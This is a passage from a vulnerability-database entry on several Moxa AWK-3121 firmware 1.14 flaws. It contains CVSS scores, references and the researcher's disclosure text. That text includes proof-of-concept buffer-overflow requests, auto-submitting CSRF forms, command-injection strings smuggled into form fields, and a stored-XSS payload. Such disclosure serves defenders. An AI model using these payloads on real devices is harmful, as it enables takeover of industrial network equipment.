form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 2.7
},
{
"db": "NVD",
"id": "CVE-2018-10700",
"trust": 2.7
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-328",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120486",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10700",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"id": "VAR-201906-0790",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120486"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.613000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.moxa.com/en/"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10700"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120486"
},
{
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120486"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"date": "2019-06-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.670000",
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-10T00:00:00",
"db": "VULHUB",
"id": "VHN-120486"
},
{
"date": "2019-06-10T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10700"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015599"
},
{
"date": "2019-06-10T23:29:02.230000",
"db": "NVD",
"id": "CVE-2018-10700"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Cross-site scripting vulnerability in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015599"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-328"
}
],
"trust": 0.6
}
}
VAR-201906-0783
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "srvName" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 A buffer error vulnerability exists in the 'srvName' parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker to compromise sensitive data such as credentials.
[VulnerabilityType Other] HTTP traffic by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It is intended that an administrator can download /systemlog.log (the system log).
[Additional Information] POC http://192.168.127.253//systemlog.log
[Vulnerability Type] Incorrect Access Control
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can navigate to URL and download the systemlog file without any authentication or authorization
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The session cookie "Password508" does not have an HttpOnly flag.
[VulnerabilityType Other] Missing HttpOnly flag on session cookie
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can use cross-site scripting attack to access the session cookie "Password508" which can allow an attacker to login into the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a Wi-Fi connection that is open and does not use any encryption mechanism by default. An administrator who uses the open wireless connection to set up the device can allow an attacker to sniff the traffic passing between the user's computer and the device. This can allow an attacker to steal the credentials passing over the HTTP connection as well as TELNET traffic. Also an attacker can MITM the response and infect a user's computer very easily as well.
[VulnerabilityType Other] Open WiFi Connection
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Device
[Attack Type] Remote
[Impact Information Disclosure] true
[Attack Vectors] An attacker can monitor the Wifi channels using Kismet or some other opensource software and an wireless card in monitor mode and sniff all the traffic including HTTP traffic as well as SSH and Telnet traffic.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_SendTestEmail HTTP/1.1 Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute the buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device provides a web interface to allow an administrator to manage the device.
[Additional Information] POC to change name of the device
<html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
<html <body <form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded" <input type="hidden" name="SaveValue" value="1" / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Request Forgery (CSRF)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can trick an administrator of the device to visit an attacker controlled page while connected to the network and thus trick to change the password or any other setting
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
POST /forms/webSetPingTrace HTTP/1.1 Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
[VulnerabilityType Other] Command injection in Ping functionality
[Vendor of Product] Moxa
[Affected Product Code Base] AWK 3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user.
[VulnerabilityType Other] Insecure service Telnet enabled by default
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Telnet daemon
[Attack Type] Remote
[Impact Code execution] true
[Impact Information Disclosure] true
[Attack Vectors] An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_certUpload HTTP/1.1 Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962 Content-Disposition: form-data; name="iw_privatePass"
;ping -c 9 192.168.127.103 ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1 ... 114782935826962 Content-Disposition: form-data; name="certSection"
certWlan ... 114782935826962 Content-Disposition: form-data; name="rfindex"
0 ... 114782935826962 Content-Disposition: form-data; name="Submit"
Submit ... 114782935826962 Content-Disposition: form-data; name="certFile1"
test.txt ... 114782935826962 Content-Disposition: form-data; name="certFile"; filename="blob" Content-Type: text/xml
<a id="a"<b id="b"hey!</b</a ... 114782935826962--
[VulnerabilityType Other] Command injection in file upload
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC <html <body <form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded" <input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" / <input type="hidden" name="iw_board_deviceLocation" value="" / <input type="hidden" name="iw_board_deviceDescription" value="" / <input type="hidden" name="iw_board_deviceContactInfo" value="" / <input type="hidden" name="Submit" value="Submit" / <input type="hidden" name="bkpath" value="/sysinfo.asp " / </form <script setTimeout("document.forms['f'].submit();",1); </script </body </html
[Vulnerability Type] Cross Site Scripting (XSS)
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.9
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Impact Escalation of Privileges] true
[Impact Information Disclosure] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC POST /forms/web_runScript HTTP/1.1 Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC" Content-Type: application/octet-stream
ls -ltr ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_storage"
tftp ... 7e21a62f2905ca Content-Disposition: form-data; name="iw_serverip"
ping -c 3 192.168.127.101
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0783",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10693"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10693",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-10693",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-120478",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10693",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10693",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-321",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120478",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10693",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120478"
},
{
"db": "VULMON",
"id": "CVE-2018-10693"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015588"
},
{
"db": "NVD",
"id": "CVE-2018-10693"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-321"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It provides ping functionality so that an administrator can execute ICMP calls to check if the network is working correctly. However, the same functionality allows an attacker to execute commands on the device. The POST parameter \"srvName\" is susceptible to a buffer overflow. By crafting a packet that contains a string of 516 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. Moxa AWK-3121 A buffer error vulnerability exists in the \u0027srvName\u0027 parameter in version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n 